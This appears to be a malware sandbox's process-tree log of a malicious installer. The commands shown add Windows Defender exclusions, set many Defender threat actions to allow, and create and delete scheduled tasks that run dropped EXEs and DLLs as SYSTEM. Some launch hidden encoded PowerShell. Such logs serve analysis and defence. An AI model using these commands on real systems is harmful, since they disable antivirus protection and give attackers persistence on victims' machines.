C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:643⤵PID:1384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:323⤵PID:740
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:643⤵PID:2304
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfNaqWuZy" /SC once /ST 00:31:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:3260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfNaqWuZy"2⤵PID:5264
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfNaqWuZy"2⤵PID:4356
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 01:16:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe\" Wy /BGYZdidXU 757674 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2344 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FPIEUdZLMYPzsiUNM"2⤵PID:1084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 9362⤵
- Program crash
PID:1080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1252
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1836
-
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exeC:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe Wy /BGYZdidXU 757674 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"2⤵PID:4212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2628
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:1492
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1448 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\rBOWGj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5156 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\xlHRzsY.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:896 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OcPshDNvhDnVmSv"2⤵PID:868
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OcPshDNvhDnVmSv"2⤵PID:5868
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\USRawYq.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3600 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\usrdqkC.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\uaMQFLy.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5776 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\jPLBMmW.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:06:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll\",#1 /cididxj 757674" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRTHivZIQsRdEanwm"2⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe" /S YB2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:3184 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵PID:1184
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵PID:5824
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:3936 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:3600
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe\" z0 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 11083⤵PID:2208
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wDjRE1" /SC once /ST 01:43:25 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wDjRE1"2⤵PID:3000
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wDjRE1"2⤵PID:3140
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"2⤵PID:2088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 20642⤵PID:5620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1916 -ip 19161⤵PID:4736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4116 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd82⤵PID:5536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:22⤵PID:3484
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:32⤵PID:5176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:82⤵PID:2304
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:4028
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:4680
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:12⤵PID:3868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:12⤵PID:4184
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4160
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5828 -ip 58281⤵PID:3656
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll",#1 /cididxj 7576741⤵PID:4224
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\dSWxadCE\GpiHvfu.dll",#1 /cididxj 7576742⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5040 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"3⤵PID:1704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5828 -ip 58281⤵PID:1544
-
C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"1⤵PID:1080
-
C:\Users\Admin\AppData\Local\Temp\is-60T68.tmp\setup_34Uv1hLE7B.tmp"C:\Users\Admin\AppData\Local\Temp\is-60T68.tmp\setup_34Uv1hLE7B.tmp" /SL5="$C02A6,6120275,56832,C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5628 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"3⤵PID:1492
-
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 1711397ec0a91dd980a7244b5bb3ba843⤵
- Executes dropped EXE
PID:1980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 1524⤵
- Program crash
PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1980 -ip 19801⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exeC:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe z0 /S1⤵PID:5316
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2888 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1384
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:2348
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5880
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2860
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5568
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5152
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1128
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1852
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5176
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:708
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1912
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3284
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5064
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5760
-
